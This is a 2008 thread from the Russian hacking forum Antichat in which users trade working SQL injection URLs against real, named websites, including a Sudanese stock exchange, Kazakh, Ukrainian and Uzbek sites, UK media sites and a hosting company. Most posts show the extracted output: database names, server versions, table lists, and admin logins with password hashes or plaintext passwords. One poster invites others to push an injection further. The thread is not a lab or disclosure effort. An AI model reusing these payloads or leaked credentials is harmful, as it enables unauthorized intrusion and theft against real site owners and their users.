ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #6961  
Старый 28.11.2008, 17:21
Аватар для j0ker13
j0ker13
Участник форума
Регистрация: 28.07.2008
Сообщений: 199
Провел на форуме:
861008

Репутация: 58
По умолчанию

Цитата:
http://www.unique.co.uk/pressview.php?ID=44
http://www.unique.co.uk/pressview.php?ID=-1+union+select+1,2,concat_ws(0x3a,uname,pword),4,5 +from+users--

admin:b83dea104b4e116367c8477fc9b8740a
 
Ответить с цитированием

  #6962  
Старый 28.11.2008, 18:15
Аватар для plutus
plutus
Новичок
Регистрация: 03.11.2008
Сообщений: 25
Провел на форуме:
34070

Репутация: 20
По умолчанию

http://www.mapsoft.co.yu/dev/comersus/database/comersus.mdb [база]

http://www.cyprushotelsdirect.com/info.php?hotelid=-159+union+select+version()--&showtab=overview
4.1.22-standard

http://bonjourvoyage.com/critik/review.php?hotelID=-1014+union+select+1,2,3,4,table_name,6,7,8,9+from+ information_schema.tables--
5.0.32-Debian_7etch1-log
не было времени раскрутить.

Последний раз редактировалось plutus; 28.11.2008 в 18:17..
 
Ответить с цитированием

  #6963  
Старый 28.11.2008, 18:28
Аватар для Dobby007
Dobby007
Познающий
Регистрация: 07.09.2008
Сообщений: 55
Провел на форуме:
163517

Репутация: 57
Отправить сообщение для Dobby007 с помощью ICQ
По умолчанию

megamaika.kz - магазин.
http://www.megamaika.kz/index.php?content_id=5+UNI_ON+SELECT+1,CON_CAT(0x3 C623E44617461626173653A3C2F623E20,Database(),0x3C6 2723E3C623E557365726E616D653A3C2F623E20,User(),0x3 C62723E3C623E56657273696F6E3A3C2F423E20,Version()) ,3+LIMIT+1,1/*
Database: megamaik_megamaika
Username: megamaik_root@localhost
Version: 4.1.21-standard


З.Ы. Если кто раскрутит инъекцию дальше, буду только рад. Только просьба выложить сюда. А то сами понимаете - молодой еще, только учусь =)... Может чего-то и не учитываю НО там, насколько я понял, привелигии просто урезаны.

aikyn.kz - партия чтоли какая-та. так и не понял =)
http://www.aikyn.kz/site.php?lan=kaz&id=166&pub=21940+UNION+SELECT+1,2 ,3,4,5,6,7,8,9,10,11,CONCAT(0x3C623E44617461626173 653A3C2F623E20,Database(),0x3C62723E3C623E55736572 6E616D653A3C2F623E20,User(),0x3C62723E3C623E566572 73696F6E3A3C2F423E20,Version(),0x3C62723E3C623E446 174613A3C2F623E20,table_name)+from%20information_s chema.tables+LIMIT+18,1/*

Ну здесь уже по-больше можно сделать. Хотя б к information_schema доступ имеется.

Database: aikyn
Username: aikyn@localhost
Version: 5.0.45-community-nt

Вот таблицы все:
banners
gallery
modules
news_kaz
noc
notes
poll_kaz
pub_kaz
str_kaz
themes

Последний раз редактировалось Dobby007; 28.11.2008 в 21:09..
 
Ответить с цитированием

  #6964  
Старый 29.11.2008, 00:34
Аватар для faza02
faza02
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435

Репутация: 1013
По умолчанию

Код:
http://www.ubcmedia.com/pressview.php?ID=-101+union+select+1,2,3,4,5/*
4.1.20

Код:
http://www.uniquebroadcasting.com/pressview.php?ID=-15+union+select+1,2,3,4,5/*
4.1.20

Код:
http://www.unique.co.uk/pressview.php?ID=-155+union+select+1,2,3,4,5/*
4.1.20

Код:
http://www.barnabasventures.com/pressview.php?ID=-64+union+select+1,2,3,4,5,6,7/*

Код:
http://www.ubcmediagroup.com/pressview.php?ID=-166+union+select+1,2,3,4,5/*
4.1.20

ыы)) один и тот же сайт))

//jOker13, ку)

Последний раз редактировалось faza02; 29.11.2008 в 00:43..
 
Ответить с цитированием

Khartoum Stock Exchange
  #6965  
Старый 29.11.2008, 03:26
Аватар для plutus
plutus
Новичок
Регистрация: 03.11.2008
Сообщений: 25
Провел на форуме:
34070

Репутация: 20
По умолчанию Khartoum Stock Exchange

http://www.ks e.com.sd/show_item_ar.php?id=-7+union+select+1,2,version(),4--&t=0

5.0.51a-community-log

http://www.attorn eys.si/index.php?page=archive&F=D&ID=-106+union+select+1,2,version(),4,5,6--
5.0.45

http://press.keppelland.com.sg/article.asp?id=-384+union+select+1,2,3,4,5,version(),7--&q=4&y=2001
4.0.21-debug-log

Последний раз редактировалось plutus; 29.11.2008 в 04:42..
 
Ответить с цитированием

  #6966  
Старый 29.11.2008, 11:58
Аватар для Dimi4
Dimi4
Reservists Of Antichat - Level 6
Регистрация: 19.03.2007
Сообщений: 953
Провел на форуме:
7617458

Репутация: 3965


Отправить сообщение для Dimi4 с помощью ICQ
По умолчанию

karabin.com.ua

Цитата:
http://www.karabin.com.ua/statlq.php?c_i=-250+union+select+1,2--

Database Version: 5.0.22-standard
Database name: karabin_db1
User name: karabin_db1@localhost


Цитата:
http://www.karabin.com.ua/statlq.php?c_i=-250+union+select+name,password+from+auth_members--
Код:
Geen 9a60736ac38bb969ae574715a665fa69 (1230456789)
naprokat.com.ua (213.186.116.231)
Database Version: 5.0.22-standard
Database name: karabin_db7
User name: karabin_npr@localhost


Код:
http://naprokat.com.ua/board.php?parr=-6+union+select+1--
 
Ответить с цитированием

  #6967  
Старый 29.11.2008, 12:09
Аватар для ThreeD
ThreeD
Banned
Регистрация: 25.12.2006
Сообщений: 179
Провел на форуме:
2337678

Репутация: 354
По умолчанию

www.hym.com.au

http://www.hym.com.au/product-detail.php?id=-71+union+select+1,version(),3,4,5,6,7,8,9,10,11,12 ,13,14,15,16,17/*

4.1.25-Debian_mt1
 
Ответить с цитированием

  #6968  
Старый 29.11.2008, 13:35
Аватар для geezer.code
geezer.code
Reservists Of Antichat - Level 6
Регистрация: 22.01.2007
Сообщений: 616
Провел на форуме:
7452489

Репутация: 1359


По умолчанию

Оптечко
Код:
http://www.lahisam.uz/?lang=ru&id=09814%27+union+select+1,concat_ws(0x3a,lgn,psw,status),3,4,5+from+users+limit+0,1/*
admin:fenixz:adm
 
Ответить с цитированием

  #6969  
Старый 29.11.2008, 16:20
Аватар для Shaitan-Devil
Shaitan-Devil
Участник форума
Регистрация: 15.08.2008
Сообщений: 167
Провел на форуме:
3009843

Репутация: 204
По умолчанию

Код:
http://rcnit.kz/index.php?p=-32+union+select+1,concat_ws(0x3a,id,login,pwd),3,4,5,6,7,8+from+rcnit_kz.auth--
admin:279634
Форум
Код:
Administrator:e6e62645328f659db3ffbd82cd537fa1;
8830b3439a6c7870f32087802997a82a;
 
Ответить с цитированием

  #6970  
Старый 29.11.2008, 16:23
Аватар для ThreeD
ThreeD
Banned
Регистрация: 25.12.2006
Сообщений: 179
Провел на форуме:
2337678

Репутация: 354
По умолчанию

Буржуйский хостинг

www.spoonohost.com

Цитата:
http://www.spoonohost.com/about/news.php?id=22+union+select+1,concat_ws(0x3A3a,use r(),version(),database()),3,4,5/*
User::sphost_sphost@localhost
Version::4.1.22-standard-log
Database::sphost_main

Последний раз редактировалось ThreeD; 29.11.2008 в 16:26..
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ